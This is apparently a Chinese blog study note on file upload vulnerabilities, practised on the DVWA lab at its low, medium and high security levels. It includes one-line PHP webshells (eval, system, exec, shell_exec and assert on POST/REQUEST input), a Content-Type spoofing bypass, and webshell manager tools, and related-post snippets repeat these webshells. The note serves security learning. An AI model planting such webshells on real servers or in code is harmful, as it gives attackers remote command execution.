《学习笔记114》—— # 文件上传漏洞 # 基于OWASP的文件上传漏洞

最新推荐文章于 2024-04-12 01:01:12 发布
最新推荐文章于 2024-04-12 01:01:12 发布
阅读量689 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53801131/article/details/119679400
版权

文件上传漏洞介绍:

正常的文件上传一般指图片、视频、文档等,web应用收集之后放入后台或者数据库存储,需要的时候再调用返回。
如果存在文件上传漏洞,黑客可以将恶意文件,比如php、jsp、asp等脚本文件上传到服务器,绕过web应用程序执行,效果相当于黑客直接拿到服务器的webshell,一旦黑客拿到webshell,则可以获取web应用的数据,删除web文件,甚至可以通过提权,进一步拿下整个服务器,还可以进行内网渗透。

文件上传漏洞和SQL注入漏洞攻击对象的区别:

  • SQL注入漏洞攻击对象是数据库
  • 文件上传漏洞主要攻击服务器

1. OWASP的文件上传漏洞

<使用OWASP的dvwa子页面中的Upload功能实现文件上传漏洞>
在这里插入图片描述
在这里插入图片描述

DVWA Security中可以修改安全级别

1.1 安全级别:low

安全级别为low下的后端代码查看。可见并为作任何的过滤,可以随意进行攻击。
在这里插入图片描述
新建post.php脚本文件如下。

<?php 
echo phpinfo()
?>

将该脚本文件上传。
在这里插入图片描述

得到url,将其替换掉原网址的#,得到完整url链接:http://192.168.192.129/dvwa/hackable/uploads/post.php
即可获取后端的php信息。

1.2 安全级别:medium

安全级别为medium的在后端做了文件类型和文件大小的限制。
在这里插入图片描述
因此直接上传是不行的,我们需要用拦截工具拦截request请求,这里使用burpsuite拦截,拦截到的post请求中将Content-Type: application/octet-stream
修改为Content-Type: image/jpeg。其余步骤与安全级别为low一致。

1.3 安全级别:high

安全级别为high的进行了文件名后缀限制以及文件大小限制。
在这里插入图片描述
因此适用于low和medium的方法在这里不生效。因此需要在上传的文件中附带木马。这里使用edjpgcom软件生成一句话木马,然后上传,获得url,最后使用中国菜刀软件解析url。

2. webshell

webshell介绍:

web后端的脚本语言一般情况下具备系统相关函数,用这些系统函数可以执行操作系统命令。如果攻击者将这些系统函数写入文件,并结合文件上传漏洞上传给web服务器,这个行为我们就称为网站挂马
这些包含了系统函数的文件我们就称为webshell文件,根据功能级别分为大马小马,例如一句话木马( 整个shell代码量只有一行 )就属于小马。

常见的php系统函数有evalsystemexecshell_execassert。下面就这几个函数进行示例。

2.1 eval函数

eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。该函数也是国产知名shell管理工具中国菜刀使用的。

注意:eval函数的参数的字符串末尾一定要有分号,在最后还要另加一个分号(这个分号是php限制)。
示例如下。

<?php eval($_POST['pass']); ?>
<?php eval($_REQUEST['pass']); ?>

2.2 system函数

system函数可以实现在php中执行shell命令。

<?php system($_POST['cmd']); ?>
<?php system($_REQUEST['cmd']); ?>

2.3 exec函数

exec函数用于执行系统命令。

<?php exec($_POST['cmd']); ?>
<?php exec($_REQUEST['cmd']); ?>

2.4 shell_exec函数

shell_exec函数用来执行系统命令。

<?php shell_exec($_POST['cmd']); ?>
<?php shell_exec($_REQUEST['cmd']); ?>

2.5 assert函数

assert函数是把字符串当作php代码来执行的。

<?php assert($_POST['cmd']); ?>
<?php assert($_REQUEST['cmd']); ?>

3. webshell管理工具

常见的webshell管理工具有:中国菜刀、C刀、寄生虫XISE、k8飞刀、weevely(Linux系统下)等。

Merrill He
关注
Kali linux 学习笔记(四十三)Web渗透——扫描工具之OWASP_ZAP 2020.3.19
闵行小鱼塘
03-19 1218
扫描工具之OWASP_ZAP
OWASP Top 10 网络安全10大漏洞——A01:2024-访问控制中断
2401_83947398的博客
04-12 909
访问控制是指控制对信息或功能的访问权限的系统。损坏的访问控制使攻击者可以绕过授权并执行任务,就像他们是管理员等特权用户一样。例如,Web 应用程序可能允许用户仅通过更改 url 的一部分即可更改他们登录的帐户,而无需任何其他验证。
文件上传漏洞_OWASP_DVWA_Upload
baola的博客
07-30 533
本讲述了什么是文件上传漏洞,并通过有漏洞的web应用程序演示如何进行漏洞利用。
OWASP-文件上传漏洞简述(低中高)
qq_55803921的博客
11-04 1121
OWASP-文件上传漏洞简述:OWASP-文件上传漏洞(低级):OWASP-文件上传漏洞(中级):OWASP-文件上传漏洞(高级):webshell文件包含: 注:仅作学习使用 OWASP-文件上传漏洞(低级): 首先上传一个jgp图片,测试它上传成功的反应: 发现上传成功是这样的: 然后试试上传其他类型的文件,此处是一个html的文件,发现可以上传成功: 再试试上传一句话木马可不可以: 上传成功哈: 访问一下自己的文件(靶场不同于网站,其他网站得自己找路径): 虽然没看显示东西,但是东西就在这里
OWASP Top 10之文件上传漏洞简析(二)
weixin_30553065的博客
07-21 308
0x01. 在问题一(详见上文)中,获取文件后缀名$file_type = $_FIELS['file']['type'],通过和白名单比较,假如相同,则取上传文件的后缀名。上文说过,MIME头欺骗问题(这里不考虑重命名文件名问题),如果上传数据包修改Content-type的类型,$file_type就获取修改后文件类型。 如:上传1.php=>burpsuite拦截修改数据...
基于owasp实现文件上传漏洞
M_Young的博客
12-05 694
理论分析: 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。 <?php @eval(S_POST[’pass’]);?> 一句话木马 步骤 首先,
OWASP TOP 10(三)文件上传漏洞(概述、原理、webshell(大小马)、getshelll、upload-labs靶场、%00截断、.htaccess攻击、web容器解析/文件编辑器漏洞
Pluto.的博客
12-22 2629
文章目录OWASP TOP 10文件上传漏洞一、概述1. 漏洞简述2. 漏洞成因3. 漏洞危害二、WebShell1. 概述2. 大马3. 小马3.1 概述3.2 一句话木马+中国蚁剑三、文件上传漏洞1. GetShell2. 利用的条件telnet模拟http请求3. 防御 | 绕过 | 利用黑白名单策略4. upload-labs靶场5. 前端限制与绕过6. 服务端检测6.1 检测MIME类型6.2 检测文件内容类型6.3 检测文件后缀名 OWASP TOP 10 文件上传漏洞 一、概述 1. 漏洞简述
OWASP Top 10 网络安全10大漏洞——A02:A02 2024-加密机制失效
最新发布
2401_83947398的博客
04-12 421
由于传输过程中缺少加密或弱加密,或者意外暴露敏感数据,可能会发生加密失败情况。首先确定传输中数据的保护需求和休息。例如,密码、信用卡号、健康 记录、个人信息和商业机密需要额外的保护,主要是如果该数据属于隐私法,例如欧盟的通用数据保护条例(GDPR)或法规,例如金融数据保护,例如 PCI 数据安全标准(PCI DSS。属于隐私法的数据,是否存在以明文传输的问题。数据是否适用旧的较弱的加密算法和协议来加密。收到的服务器证书和信任链是否经过验证。设计加密机制是是否考虑随机性。
Kali linux 学习笔记(四十一)Web渗透——扫描工具之w3af 2020.3.18
闵行小鱼塘
03-18 1447
扫描工具之w3af
安全学习笔记】Kali Linux渗透测试方法
edu_aqniu的博客
11-09 2400
1.安全问题的根源 ①由于分层思想,导致每个层次的相关人员都只关心自己层次的工作,因此每个人认识系统都是片面的,而安全是全方位的,整体的,所以造成安全问题。 ②技术人员追求效率,导致只追求功能实现,而很容易忽略安全性的工作 ③由于人都是会犯错误的,因此最大的安全威胁是人,所以无法避免安全隐患,但可以降低安全风险 软件安全生命周期: 需求——>设计——>编码——>测试—
上传文件漏洞靶场upload-labs
09-27
上传文件漏洞靶场upload-labs,用于练习上传文件漏洞学习web安全的小白可用。我的博客也有详细的使用教程
Web安全渗透OWASP-DVWA文件上传与文件包含漏洞
lx1315998513的博客
10-29 2297
配置环境 下载并启动OWASP Broken Web Apps VM v1.2(注意:网站IP地址由自己具体IP为准) Welcome to the OWASP Broken Web Apps VM !!! This VM has many serious security issues. We strongly recommend that you run it only on the...
OWASP文件上传漏洞总结(低,中)
weixin_51333478的博客
04-28 382
OWASP Broken Web Apps VM v1.2靶场的Damn Vulnerable Web Application中的文件上传漏洞 1.低安全级别(low) 可以上传任意类型的文件,存在上传,木马的分线,例如:一句话木马< ?php @eval($ _POST [ ‘pass’])?> ,其中pass为密码。 上传成功后显示如下状态 然后拼出整个url(去掉原地址栏的#) 最终URL为 使用菜刀新建该URL便可以进入靶机。(菜刀的连接可能与防火墙有关,我中间没有连接成功
文件上传 06 解析攻击
kevinhanser
08-13 716
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 解析攻击 网络渗透的本质 主体就是代码注入+代码解析/执行 像缓冲区溢出攻击,sql 注入攻击,文件上传攻击,文件包含攻击,脚本代码注入等等 主要分为两种情况 直接解析/执行攻击 像缓冲区溢出和sql 注入攻击,脚本代码注入就是很明显的属于这里攻击 直接将代码注入到一个...
OWASPBWA的搭建及简单学习文件上传漏洞
小城的博客
11-08 3367
OWASPBWA的搭建及学习 我直接将我使用的OWASPBWA的链接地址发出来 owasp下载链接:https://jaist.dl.sourceforge.net/project/owaspbwa/1.2/OWASP_Broken_Web_Apps_VM_1.2.7z 将这个链接复制到迅雷下载即可,大概是1.7G,网速快的话很快就下好了。 下载完之后直接解压,然后点击vm右上角的文件直接选择打开这个文件夹即可使用 * * 进入机子后,输入ip a 查看机子的ip地址 得到靶机的地址后,我们可以在浏览器
Web安全(一)文件上传漏洞[一]
qq_43681532的博客
03-14 849
个人博客:https://hackbg.gitee.io/ 文章目录文件上传漏洞概述二、编辑木马文件并上传1.eval函数2.PHP一句话木马上传PHP文件webshell执行命令使用中国菜刀连接不同语言一句话木马 文件上传漏洞概述 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、改头像、分享图片等。 文件上传漏洞是在开发者没有做充足验证(包括前端,后端)情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者Webshell等。 二、编辑木马文件并
基于owasp实现文件包含漏洞
M_Young的博客
12-05 443
文件包含渗透 <?fputs(fopen(‘‘shell.php’’, ‘‘w’’),‘<?php eval($_POST[pass]);?>’)?> 注:打开shell.php的文件,并写入<?php eval($_POST[pass]);?> 就在本地生成了一句话木马,然后就可以通过菜刀这样的工具连接木马。 本地文件包含LFI:(首先需要上传文件,才能修改=后面的文件) 192.168.40.108/dvwa/vulnerabilities/fi/index.php
PHP中常见的命令执行函数与代码执行函数
热门推荐
→_→
10-22 1万+
参考: https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数: 1- eval() #传入的参数必须为PHP代码,既需要以分号结尾。 #命令執行:cmd=system(whoami); #菜.
网络安全——文件上传漏洞及防御
qq_39103818的博客
03-12 835
没有网络安全就没有国家安全 不知攻,焉知防 自动化网络防御体系 监控,比如网卡流量异常的时候,当CPU负载异常的时候 法律原因,不要对任何网站进行渗透扫描和漏扫,都属于有网络攻击的意向,属于犯法行为。 有专门的靶机 文件上传漏洞 没有经过后缀名的筛选,允许任何类的文件上传。 如果是一些php,asp的文件上传后,则相当于黑客直接拿到了webshell,还能通过中国菜刀之类的工具去控制这个网站。 1...
Web安全小白入门:文件上传漏洞原理与实验演示
在网络安全领域,文件上传漏洞原理是初学者探索Web安全的重要环节。文件上传功能是许多Web应用程序的基础功能,它允许用户上传诸如文档、图片和视频等常规文件,这些文件随后被应用程序接收并存储在后端服务器上,供...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Merrill He

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值